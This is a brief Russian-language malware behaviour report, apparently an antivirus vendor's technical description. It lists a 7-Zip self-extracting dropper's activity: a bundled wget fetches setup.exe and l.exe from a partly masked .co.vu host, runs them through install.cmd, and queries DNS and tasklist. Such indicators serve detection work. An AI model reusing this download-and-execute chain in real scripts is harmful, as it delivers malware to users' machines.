Техническая информация
- '%TEMP%\7ZipSfx.000\setup.exe'
- '%TEMP%\7ZipSfx.000\wget.exe' http://ra######thritef1988.co.vu/setup.exe
- '%TEMP%\7ZipSfx.000\wget.exe' http://ra######thritef1988.co.vu/l.exe
- '%TEMP%\7ZipSfx.000\l.exe'
- '%TEMP%\7ZipSfx.000\setup.exe' (загружен из сети Интернет)
- '%TEMP%\7ZipSfx.000\l.exe' (загружен из сети Интернет)
- '<SYSTEM32>\find.exe' "wget.exe"
- '<SYSTEM32>\tasklist.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "
- %TEMP%\7ZipSfx.000\l.exe
- %TEMP%\7ZipSfx.000\setup.exe
- %TEMP%\7ZipSfx.000\install.cmd
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\setup.exe
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\install.cmd
- %TEMP%\7ZipSfx.000\l.exe
- 'ra######thritef1988.co.vu':80
- ra######thritef1988.co.vu/setup.exe
- ra######thritef1988.co.vu/l.exe
- DNS ASK ra######thritef1988.co.vu